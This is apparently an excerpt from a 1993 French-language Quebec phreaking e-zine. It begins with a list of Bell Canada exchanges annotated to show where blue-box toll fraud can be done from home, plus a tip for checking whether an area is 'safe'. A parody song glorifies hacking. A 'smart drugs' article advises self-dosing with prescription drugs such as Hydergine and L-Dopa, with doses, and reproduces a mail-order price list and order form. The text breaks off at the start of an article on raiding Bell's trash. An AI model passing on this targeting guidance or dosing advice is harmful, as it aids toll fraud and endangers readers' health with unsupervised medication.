SHERBROOKE 252-3-5 x
SHERBROOKE 251-4-6-7-9-899 LAMA
SHERBROOKE 283 RLM
SOREL 742-3 x
SOREL 746 LAMA
SUTTON 538 x
TERREBONNE 471-492 x
TERREBONNE 964 LAMA
VALLEYFIELD 371-3 x
VALLEYFIELD 370-7 x
VARENNES 652 x
VAUDREUIL 424-455 x
VERCHERES 583 x
VERDUN 362-761-2-5-6-7-8-9-888-976 LAMA
VILLE LE GUARDEUR 581-5 x
VILLE LE GUARDEUR 582-654-7 LAMA
WATERLOO 539 x
YAMASKA 789
COTEAU DU LAC 763 x
COTEAU LANDING 267 x
COTE-DES-NEIGES CG1 340-3-4-345-731-2-4-5-9 LAMA
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
COTE-DES-NEIGES CG0 341-2-736-7-8 LAMA
COTE-DES-NEIGES 283 RLM
COWANSVILLE 263 x
COWANSVILLE 266 x
CRABTREE 754 x
DORVAL VOIR LACHINE-DORVAL
DUDEMAINE 330-1-2-3-4-5-6-7-8-9-741-5-832-856 LAMA
DUDEMAINE (COPS) 851-3-749 & 957 LAMA
DUNHAM 295 x
EASTMAN 297 x
FARNHAM 293 x
FRANKLIN CENTRE 827 x
FRELIGHSBURG 298 x
GRANBY 375-8-776-7 x
GRANBY VICTORIA 372 x
HEMMINGFORD 247 x
HENRYVILLE 299 x
HOWICK 825 x
HUDSON 458 x
HUNTINGTON 264 x
ILE PERROT 425-453 x
JOLIETTE 752 LAMA
JOLIETTE 753-6 x
JOLIETTE 755-9 x
KNOWLTON 242 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
KNOWLTON 243 x
LACHINE-DORVAL 422-631-3-6 LAMA
LACHINE-14e Ave. 634-7-9 LAMA
LACHUTE 562 x
LACOLLE 246 x
LANORAIE 887 x
LAPRAIRIE 444-659 x
LASALLE 363-5-6-8-595 LAMA
LASALLE 364-7 x
L'ASSOMPTION 589 x
LAVAL-EST 688 x
LAVAL OUEST-PRINC. 689 x
LAVAL OUEST-PRINC. 969 LAMA
LAVAL OUEST-SAUVE 627 x
LAVAL OUEST-SAUVE 962 x
LAVALTRIE 586 x
L'EPIPHANIE 588 x
LES CEDRES 452 x x
LONGUEUIL-ST-I. 442-463-646-651-670-4-7-9-928 LAMA
ST-URBAIN 639 x
SACRE-COEUR 236 x
SAULT-AUX-MOUTONS 231 x
SQUATEC 855 x
STONEHAM 848 RLM
STRATFORD 443 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
TADOUSSAC 235 x
THETFORD MINES 334-5-8 LAMA
TRING JONCTION 426 x
TROIS PISTOLES 851 x
VALCARTIER 844 x
VILLE DEGELIS 653 x
ACTONVALE 546 x
ANJOU 351-2-3-4-5-6-493 x
ATWATER 930-3-7-8-9-936-854-846 LAMA
ATWATER 931-2-4-5-951 x
-6-8-9
BEAUHARNOIS 429 x
BEAUHARNOIS 225 x
BEDFORD 248 x
BELMONT 390-3-6-874-9 x
954
BELMONT 392-5-9-876-7-8 LAMA
BELMONT 394-7-8-868-870-1-2-5 LAMA
BELMONT 861-6-864-873 LAMA
BELMONT 390-391 LAMA
BELOEIL 464-7 x
BELOEIL 446 x
BERTHIERVILLE 836 x
BOUCHERVILLE 449-641-655 x
BROMONT 534 x
BROWNSBURG 533 x
CHAMBLY 447-658 RLM
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
CHATEAUGUAY 591-2-8 x
CHATEAUGUAY 699 LAMA
CHOMEDEY 681-2-6-7-8-973 LAMA
CLARENCEVILLE 294 x
METABETCHOUAN 349 x
MILOT 373 x
MONTAPICA 467 x
NORMANDIN 274 x
N.D. DES LAURENTIDE 849-841 x
N.D. DU LAC 899 x
PARC LAURENTIDES 846 x
PERIBONKA 374 x
PET.RIV.ST-FRANCOIS 632 x
RIVIERE BLEUE 893 x
RIVIERE DU LOUP 862-7-8 x
ROBERVAL 275 x
ST-ALEXANDRE DE K. 495 x
ST-AMBROISE 672 x
ST-ANDRE DE K. 493 x
STE-ANNE BEAUPRE 827 x
STE-ANNE PORTNEUF 238 x
STE-BRIGITTE LAVAL 825 x
STE-CATHERINE 875 x
ST-CYRILLE 527-681-2-3-4-6-7-8 LAMA
ST-ELEUTHERE 859 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
ST-FELICIEN 679 x
ST-FERDINAND D'H. 428 x
ST-FEREOL 826 x
ST-FIDELE 434 x
STE-FOY 651-3-7-8-9670 LAMA
STE-FOY (CGO) 563-4-650-2-4-656 LAMA
ST-FULGENCE 674 x
ST-GEDEON 345 x
ST-HILARION 457 x
ST-HONORE 673 x
ST HONORE DE TEM. 497 x
ST-IRENEE 452 x
ST JEAN DE DIEU 963 x
ST-JEAN ILE ORLEANS 829 x
ST-LEON DE CHIC 481 x
ST-NICOLAS 831 x
ST-NICOLAS 836 x
ST-PACOME 852 x
ST-PASCAL DE K. 492 x
STE-PETRONILLE 828 x
ST-PHILIPPE DE NERI 498 x
ST-PRIME 251 x
ST-REAL 528-641-643-4-6 LAMA
RLCM
ST-REAL 529-640-7-8-9-691 RLCM
ST-REAL 521-2-3-4-5 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
ST-ROMUALD 834 x
STE-ROSE DU NORD 675 x
ST-SIMEON 638 x
ST-TITE DES CAPS 823 x
AEROPORT BAGOTVILLE 677 x
ALBANEL 279 x
ALMA 662-8-9 x
ANCIENNE LORETTE 871-2-4-7 x
ANSE ST-JEAN 272 x
BAIE STE-CATHERINE 237 x
BAIE ST-PAUL 435 x
BEAUPORT 661-3-4 x
BEAUPORT 660-6-7 x
BERGERONNES 232 x
BIENCOURT 499 x
BLACK LAKE 423 x
BOISCHATEL 822 x
CABANO 854 x
CHAMBORD 342 x
CHARLESBOURG 621-2-3-4-6-7-8-890-976 LAMA
CHARNY 832 x
CHICOUTIMI 545-9-690-3-8 LAMA
CHICOUTIMI 543-5-6 x
CHUTE DES PASSES 377 x
CLERMONT 439 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
D'AIGUILLON 692-4
LAMA
DESBIENS
DELISLE 347 x
DOLBEAU 276 x
EAST BROUGHTON 427 x
ESCOUMINS 233 x
FERLAND 676 x
GARTHBY 458 x
GIRARDVILLE 258 x
HEBERTVILLE 343-4 x
ILE AUX COUDRES 438 x
INVERNESS 453 x
JONQUIERE-MELLON 548 x
JONQUIERE-ST-JACQUE 542-7-695 x
LA BAIE 544-697 x
LAC BOUCHETTE 348 x
LA DORE 256 x
LA MALBAIE 665 x
LA POCATIERE 856 x
LATERRIERE 678 x
LEEDS 424 x
LES EBOULEMENTS 635 x
LEVIS 833-5-7-8 x
L'ISLE VERT 898 x
LORETTEVILLE 842-3-5-7 x
LUSKVILLE 455
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
LYSTER 389 x
MAGOG 843-7 x
MAGOG 868 x
MANIWAKI 449 x
MANQUANE 971 x
MASKINONGE 227 x
MONTEBELLO 423 x
NOMININGUE 278 x
NORTH HATLEY 842 x
N.D. DE LOURDES 385 x
PAPINEAUVILLE 427 x
PERKINS 671 x
PLESSISVILLE 362 x
POINTE GATINEAU 561-8 x
POINTE GATINEAU 243-6 x
POSTE DE BALEINE 929 x
POVUNGNITUK 988 x
QUAQTAQ 492 x
QUYON 458 x
RICHMOND 826 x
ROCK FOREST 564-821 x
ROCK ISLAND 876 x
SALLUIT 255 x
ST-ADOLPHE D'HOWARD 327 x
ST-ADOLPHE DUDSWELL 887 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
STE-AGATHE 324-5-8 x
ST-BONIFACE 535 x
ST-DONAT 424 x
ST-FAUSTIN 688 x
ST-FELIX KINGSLEY 848 x
ST-GERMAIN GRANTHAM 395 x
ST-GUILLAUME 396 x
ST-JOVITE 425 x
ST-MALO 658 x
ST-MATHIEU 532 x
STE-MONIQUE 289 x
ST-PIERRE WAKEFIELD 457 x
ST-PIERRE BECQUETS 263 x
ST-SEBASTIEN FRONT 652 x
STE-SOPHIE LEVRARD 288 x
SAWYERVILLE 889 x
SCOTSTOWN 657 x
SHAWINIGAN 5e 536-7 x
SHAWINIGAN DES H. 539 x
SHERBROOKE 346-562-3-5-6-7-9 x
SHERBROOKE 564-620-621-2-3-9 x
SOUTH DURHAM 859 x
STOKE 878 x
TASIUJAQ 633 x
THURSO 985 x
CENTRAL NNX P 5 E S D N N S N D
- X S P M 5 5 A J M
A B S 1 S - - - 9 S
- 10 1 2 1 2 100
TROIS-RIVIERES O. 377 x
TROIS-RIVIERES 374-5-6 x
TROIS-RIVIERES 370-1-2-3-8-9-380-891-3 LAMA
UMIUJAQ 331 x
VAL DAVID 322 x
VICTORIAVILLE 751-2-8 LAMA
WAKEFIELD MASHAM 456 x
WAKEFIELD VALLEY 459 x
WAKEHAM BAY 338 PBX 711
WATERVILLE 837 x
WEEDON 877 x
WICKHAM 398 x
WINDSOR 845 x
WOTTON 828 x
YAMACHICHE 296 x
Alors, 668 d'Asbestos, tu peux en thorie faire du blue-box de chez toi.
Cette liste tait date du 31 janvier 93, ce qui porte
croire que peu
de changements risquent de se produire au cours des prochains mois. Ceci
dit, il existe un moyen "low-tech" pour vrifier si vous demeurez dans
une zone relativement "safe" pour faire du bluebox: demandez tout
simplement
votre tlphoniste locale si vous pouvez bnficier de
l'option "transfert d'appels", de votre "area code". Les mmes systmes
qui ne peuvent pas dtecter les tones DTMF illgaux ne peuvent pas non
plus offrir ce service.
Pour tous ceux qui ne sont pas encore en mesure d'apprcier cette liste,
c.
.d. les dbutants du phreak, nous sommes dj
en train de prparer un
article sensationel sur les fonctions propres
CHACUNS des systmes de
Bell. Ca va tre hot!
Mais n'oubliez pas, les tout-p'tits: frauder le Bell est illgal!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
YE! C'EST JUSTEMENT LE DOCUMENT QUE NOUS AVIONS PERDU!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-(- ENTER PHUN CO -)-
by l0gRuS!
( Sung to the air of Enter Sandman, by Metallica)
Say your prayers, PD's ones
NpC's not gone
And we're there for long
You thought you were, free to sin
That NpShitø had won
But again you'd been wrong
Sleep with your deck open
Gripple your modem thight...
Exit Light (Bbs)
Enter Wild
Get down there CHoRUS
To The WorkShop of what never ends
Something's wrong
Encrypt philes
RCMP tonight
And other lames that bites...
Dreams of wars, Dreams of Trashs
Dreams of Deckering Fast
And of Cyberspace's lights..
Sleep with Toneloc open
Keep your board trojan-tight
CHoRUS + Get down..
Now i lay, down to sleep
Pray the Lord NpC for keeps
If NpC dies, before i awake
Pray the Lord anarchy remains..
Hush little lame, don't say a word
And never mind that noise you heard
It's just the Staff under your bed
A Zip-Gun pointed at your head..
Exit Light
Enter Wild
Bell's afraid
Exit Light
Enter Wild
Take my hand
To the WorkShop of what never ends
[( End of song )]
ø: Can be remplaced by Mephisto, 9-1-1, Dynamix, Morin, Lamers at
will..
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
NOUS AUSSI, NOUS SAURONS VOUS FAIRE CHANTER
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
SMART DRUGS REDUX
par
Coaxial Karma
"Drugs that boost intelligence..."
Aprs l'article de Blitzkreig sur les smarts drugs (voir NPC #2), voici
l'article y faisant suite...
Pour les "cyberpunks", les "hackers" et les "phone phreaks", la
ralit est quelque chose qui doit tre rehausse, change, ou
ajuste
ses besoins. La ralit est infinie; la seule chose qui
nous limite dans ce monde est notre cerveau. Cependant, il existe
plus d'un moyen pour surpasser ces limites; soit en augmentant
vos capacits cognitives, soit en augmentant vos capacits
mnmoniques, soit en amliorant les changes au niveau
synaptique (ce qui vous permettra d'avoir plus de contrle sur
vous-mme: rsistance au stress, rsistance
la fatigue...),
soit en librant des hormones, telle la vasopressine, qui fera
ragir votre cerveau en consquence de celle-ci.
Dans cet article, je parlerai des trois neurotransmetteurs
principaux, et des effets causs par l'hydergine.
I- Les Neurotransmetteurs
Les scientifiques ont dcouvert que les cellules du cerveau (les
neurones) communiquaient entre elles par le biais de substances
chimiques spciales, appeles ®neurotransmetteurs¯, qu'elles
fabriquent. L'aptitude
apprendre,
se souvenir,
se nourrir,
dormir,
prouver des motions dpend de l'aptitude de nos
cellules
fabriquer ces neurotransmetteurs,
les porter aux
autres cellules du cerveau et, aussi,
rpondre aux messagers
chimiques manant des autres cellules crbrales. A mesure que
notre cerveau vieillit, il ne parvient plus
fabriquer ces
messagers chimiques essentiels et
y ragir. Or, il est
possible, dans certains cas, d'augmenter la quantit de ces
neurotransmetteurs afin de ramener le fonctionnement du cerveau
un niveau voisin de celui, caractristique, d'individus jeunes ou
au dbut de la maturit.
Notre cerveau produit ces neurotransmetteurs
partir des
substances nutritives dans nos aliments. Par exemple,
l'actylcholine est un neurotransmetteur ncessaire aux lments
du cerveau qui commandent les motions primitives, telles les
pulsions sexuelles et le degr de raction
des stimulants
extrieurs (l'veil par rapport au sommeil par exemple). Il y
joue aussi un rle trs important au niveau de la mmoire, de
l'apprentissage, de la planification
long terme. Le cerveau
produit de l'actylcholine
partir de la choline prsente dans
les aliments (entre autres le poisson) et de la lcithine (sous
forme de choline phosphatidyle). Pour que la choline soit
transforme en actylcholine, nous devons fournir des quantits
abondantes de vitamines B5 (Pantothnate de calcium ou acide
pantothnique). Attention, le bitartre de choline, la forme la
plus rpandue de choline, peut donner la diarrhe. Les doses
recommandes de choline phosphatidyle pour obtenir une
amlioration aux niveaux mnmonique, cognitif et autres, sont
de 3
5 grammes chaque jour, et pour obtenir les mmes rsultats
avec de la lcithine, les doses doivent tre de 80 grammes chaque
jour (dpendemment du pourcentage de choline contenu dans la lcithine).
Les rsultats devraient tre perus au bout de quelques
jours. Par contre, la choline prsente quelques inconvnients
pour certains (surtout quand la lcithine est rance), car les bactries
dans l'appareil intestinal la transforment parfois en une substance
odeur de poisson assez dsagrable appele trimethylamine. Cependant,
vous pouvez vous en dbarrasser en modifiant les bactries de vos
intestins par l'ingestion de yogourt, de fibres alimentaires
supplmentaires et de supplments de vitamines.
Le lvartrnol, appel aussi norpinphrine (NE), est un autre
neurotransmetteur du cerveau qui joue un rle important au
niveau de l'instinct et des motions, telles les pulsions sexuelles, de
la mmoire et de l'aptitude
apprendre. Le cerveau produit du
lvartrnol
partir de la phnylalanine et de la tyrosine, des acides
amins prsents dans la viande, les oeufs, et le fromage, entre autres.
La phnylalanine aide notre cerveau
remplacer le NE manquant. Lorsqu'on
se sent ®vid¯ mentalement, c'est peut-tre parce qu'on a puis les
rserves de NE et que le cerveau ne parvient pas
les remplacer. On peut
bel et bien ®refaire le plein¯ avec celle-ci. Pour que la transformation
de tyrosine et de phnylalanine en NE aie bien lieu, nous devons fournir
en quantit abondante des vitamines C et B6. Les doses
recommandes pour obtenir de bons rsultats varient de 100
1000
mg par jour, pendant deux semaines. On obtient de meilleurs
rsultats si celui-ci est pris
jeun, le soir avant de se
coucher, ou ds son rveil le matin. Toutefois, la tyrosine
pourrait agir sur la pression artrielle, provoquant
l'hypertension chez les uns et l'hypotension chez les autres.
MISE EN GARDE: Les individus prenant les puissant inhibiteurs MAO
ne devrait pas prendre, ni de la phnylalanine, ni de la tyrosine.
La dopamine est un autre important neurotransmetteur qui commande
aussi l'instinct sexuel et d'autres motions, le mouvement
corporel, la facult des tissus de crotre, de se rparer, le
systme immunitaire et l'humeur. Le systme dopaminergique est
l'un des systmes qui dcline le plus sous l'effet du
vieillissement. La lipofuscine, pigment de vieillissement, de la
mme substance que les taches de vieillissement cutanes, se
forme trs rapidement avec l'ge dans les systmes dont le
fonctionnement dpendent de la dopamine. La L-Dopa, acide amin
partir duquel le cerveau fabrique la dopamine, permet d'augmenter
la dure de vie chez les animaux en laboratoire d'environ 50 pour
cent. La L-Dopa est un excellent antioxydant, tant un catchol, et
a t utilis comme protection contre les radiations
haute
nergie. Pour viter de fcheuses consquences, on l'emploie avec
les lments antioxydants tel que: Vitamine E, C, B1, B5, Zinc,
Slnium, et de l'Hydergine).
MISE EN GARDE: L'usage de la L-Dopa, phnylalanine ou de la
tyrosine en doses importantes peut, toutefois, acclrer la
croissance d'un mlanome pigment malin dj
existant.
Voila pour ce qui est des neurotransmetteurs. Maintenant, voici
la deuxime partie qui sera consacr
l'Hydergine (de Sandoz).
II- L'Hydergine
L'Hydergine (de Sandoz) est un mdicament d'ordonnance apte
rtablir le fonctionnement crbral chez des personnes ges
souffrant de snilit
des degrs plus ou moins levs, ou
amliorer la fonction crbrale chez les sujets humains normaux.
Administre en doses quotidiennes de 12 mg pendant seulement deux
semaines, l'Hydergine a provoqu une amlioration de la
vigilance lmentaire et de la fonction cognitive suprieure chez
des sujets volontaires normaux.
Il agit aussi comme remontant, un peu comme la cafine, sans ses
effets secondaires sur l'humeur et les nerfs. En outre,
l'Hydergine stimule la production d'axones par le cerveau, liens
qui permettent aux neurones de communiquer entre eux et dont on a
besoin pour apprendre. Ce mdicament est trs renomm parce
qu'il permet d'accrotre notre intelligence et ensuite parce
qu'il retarde jusqu'
quatre fois l'accumulation de lipofuscine
dans les cellules crbrales. Il agit aussi sur les systmes
nerveux noradrnergique (NE) et dopaminergique du cerveau. Le
systme dopaminergique est reli aux motions,
la motivation,
aux activits autonomes du tronc crbral, aux pulsions propres
l'ambition et
l'agressivit,
la faim et au manger,
la
pulsion sexuelle,
l'instinct du territoire,
l'activit
motrice et
la stimulation de la scrtion d'hormones, comme
l'hormone somatotrope ou de croissance.
Le facteur naturel de croissance hormonale (FNC) du cerveau et
l'Hydergine semblent emprunter le mme cheminement biochimique
pour provoquer la croissance des axones.
Un traitement
base d'Hydergine exige quotidiennement environ de
12
20 mg pour un minimum de six mois
deux ans pour rgnrer
les axones de faons
raliser une amlioration optimale des
fonctions mentales. Cependant, un petit conseil, si vous aimeriez
suivre ce traitement, je vous recommande de prendre de
l'Hydergine sublinguale. Voici pourquoi: Si vous prenez de
l'Hydergine par voie buccale, vous en perdez 20 pour cent qui
sont limins dans les excrments, le foie dtruisant ensuite 40
pour cent, ce qui n'en laisse que 40 pour cent pour le reste du
corps, dont le cerveau. Par contre, administre sous forme
sublinguale, l'Hydergine est fournie au cerveau en quantit
beaucoup plus abondante. Il serait sage cependant de commencer le
traitement avec de faibles doses au dbut, pour viter les maux de ttes.
L'Hydergine peut aussi tre utile pour traiter l'hypoglycmie par
son action stabilisatrice sur la raction du cerveau
l'apport
d'nergie, le cerveau tant la partie du corps la plus sensible
l'abaissement du taux sanguin du glucose.
P.S. Voici maintenant la liste des produits d'Interlab ainsi que
les prix. Et dire qu'on fait
gratuitement...
- ADRAFINIL 40 X 300 MG TABLETS $32.00
120 X 300 MG TABLETS $115.00
- AMPHOTERICIN (ORAL) 40 X 250 MG CAPSULES $24.00
160 X 250 MG CAPSULES $85.00
- ARCALION (SULBUTIAMINE) 30 X 200 MG TABLETS $19.00
130 X 200 MG TABLETS $69.00
- BIOSTIM 8 X 1 MG TABLETS $12.00
32 X 1 MG TABLETS $42.00
- CENTROPHENOXINE 60 X 250 MG TABLETS $20.00
240 X 250 MG TABLETS $64.00
- DHEA 90 X 50 MG CAPSULES $26.00
360 X 50 MG CAPSULES $95.00
- DEPRENYL 100 X 2.5 MG TABLETS $38.00
300 X 2.5 MG TABLETS $96.00
- DEPRENYL 100 X 5 MG TABLETS $70.00
300 X 5 MG TABLETS $180.00
- ETHOXYQUIN 100 X 50 MG CAPSULES $18.00
400 X 50 MG CAPSULES $62.00
- FENOZONOLE (ORDINATOR) 30 X 10 MG TABLETS $14.00
120 X 10 MG TABLETS $50.00
- FIPEXIDE (VIGILATOR) 30 X 200 MG TABLETS $19.00
120 X 200 MG TABLETS $70.00
- FLUCONAZOLE 1 X 150 MG CAPSULE $22.00
7 X 50 MG CAPSULES $51.00
- HYDERGINE ORAL 100 X 5 MG TABLETS $36.00
400 X 5 MG TABLETS $130.00
- HYDERGINE SUBLINGUAL 100 X 4.5 MG TABLETS $32.00
400 X 4.5 MG TABLETS $115.00
- IDEBENONE (AVAN) 10 X 30 MG TABLETS $42.00
40 X 30 MG TABLETS $150.00
- KH3 (PROCAINE) 100 X 50 MG TABLETS $12.00
400 X 50 MG TABLETS $45.00
- L-DOPA (SINEMET) 100 X 110 MG TABLETS $29.00
- MELATONIN 100 X 3 MG CAPSULES $24.00
400 X 3 MG CAPSULES $86.00
- MINAPRINE (CANTOR) 30 X 100 MG TABLETS $30.00
120 X 100 MG TABLETS $108.00
- PARLODEL (BROMOCRYPTINE) 30 X 2.5 MG TABLETS $22.00
- PIRACETAM 60 X 800 MG TABLETS $18.00
240 X 800 MG TABLETS $64.00
- PHENYTOIN 250 X 100 MG TABLETS $12.00
1000 X 100 MG TABLETS $44.00
- PROPRANOLOL 500 X 10 MG TABLETS $16.00
- RETIN A/EFFEDERM 0.05% 30 GRAM TUBE $9.00
4 X 30 GRAM TUBES $32.00
- RETIN A 0.01% 15 GRAM TUBE $9.00
4 X 15 GRAM TUBES $32.00
- RIBAVIRIN (VIRAZOLE) 10 X 100 MG CAPSULES $48.00
40 X 100 MG CAPSULES $172.00
- ROXITHROMYCINE 10 X 150 MG TABLETS $32.00
- VASOPRESSIN NASAL SPRAY 12 ML BOTTLE $32.00
4 X 12 ML BOTTLES $112.00
- VINPOCENTINE 90 X 5 MG TABLETS $32.00
360 X 5 MG TABLETS $115.00
- XANTHINOL NICOTINATE 90 X 300 MG CAPSULES $14.00
360 X 300 MG CAPSULES $48.00
- ZOVIRAX CREAM 5% 2 GRAM TUBE $17.00
4 X 2 GRAM TUBES $60.00
P.S. "ALL PRICES ARE US DOLLARS AND PAYMENT IS ONLY ACCEPTED IN US
DOLLARS"
Pour conclure cet article, je vais vous donner l'adresse d'Interlab au
cas ou vous auriez envie de commencer un traitement
l'Hydergine...
INTERLAB
BCM BOX 5890
LONDRES, WC1N 3XX
ANGLETERRE
Voici aussi un exemple de bon de commande:
PRODUCT PRICE QTY AMOUNT
PIRACETAM 60 X 800 MG TABLETS $18.00 2 $36.00
...
SUB TOTAL $ 36.00
- AIR MAIL POST ADD SHIPPING $10.00 OR
ACCELERATED AIR MAIL POST ADD $15.00 (LES PRIX SONT ENCORE EN
DOLLARS US)
- PLEASE NOTE: ADD ONE ONLY OF THE POSTAL CHARGE AS REQUIRED,
FAILURE TO ADD EITHER SHIPPING CHARGE WILL RESULT IN GOODS BEING
SENT VIA SURFACE MAIL, APPROXIMATELY 10 WEEKS DELIVERY TIME
TOTAL AMOUT ENCLOSED $ 36.00 (+ SHIPPING CHARGE)
MAKE CHECK AND MONEY ORDERS PAYABLE TO INTERLAB
ALL PRODUCTS SUPPLIED TO OUR STANDARD TERMS AND CONDITIONS,
AVAILABLE ON YOUR WRITTEN REQUEST.
MAIL YOUR ORDER TO:
INTERLAB, BCM BOX 5890, LONDON, WC1N 3XX, ENGLAND.
PLEASE SEND MY ORDER TO THE FOLLOWING: (PLEASE PRINT CLEARLY)
NAME: _______________________________
ADDRESS: __________________________________________________
__________________________________________________
ZIP/POST CODE: ____________
COUNTRY: __________________
THE SECTION BELOW MUST BE COMPLETED AND SIGNED IN ORDER THAT WE
CAN SHIP YOUR ORDER;
PLEASE CHECK - HAVE YOU FILLED IN THE NAME AND ADDRESS SECTION
CORRECTLY ?
I HEREBY DECLARE THAT THESE PRODUCTS ARE FOR MY OWN USE AND NOT
FOR COMMERCIAL RESALE. FURTHER, I DECLARE THAT THIS SUPPLY DOES
NOT EXCEED THREE MONTHS USAGE AND THAT NO THERAPEUTIC CLAIMS HAVE
BEEN MADE TO ME BY THE SUPPLIER, I HAVE DISCUSSED THE USE OF
THESE ITEMS WITH A PHYSICIAN.
Et on continue la semaine prochaine, toujours avec Coaxial Karma,
toujours avec les smart drugs...
BOUM! QUAND VOTRE MOTEUR FAIT BOUM! LA DPANNEUSE SIMOUN!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
LES MEDICAMENTS ANTI-SENILITE SONT INTERDITS CHEZ NOUS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
NOUVEAU SYSTEME DU BELL POUR LES POMPIERS VOLONTAIRES
par
Blitzkreig
Une fois de plus, Northern Phun Co. tient
remercier Bell Canada pour
sa contribution (bien involontaire)
l'dification des masses... Un seul
hic, cependant, messieurs du Bell qui, d'aventure, liriez ces lignes:
vous ne pourriez-pas laisser traner dans vos poubelles des versions Word
Perfect de vos documents sur disquette? Ca nous viterait une grosse job
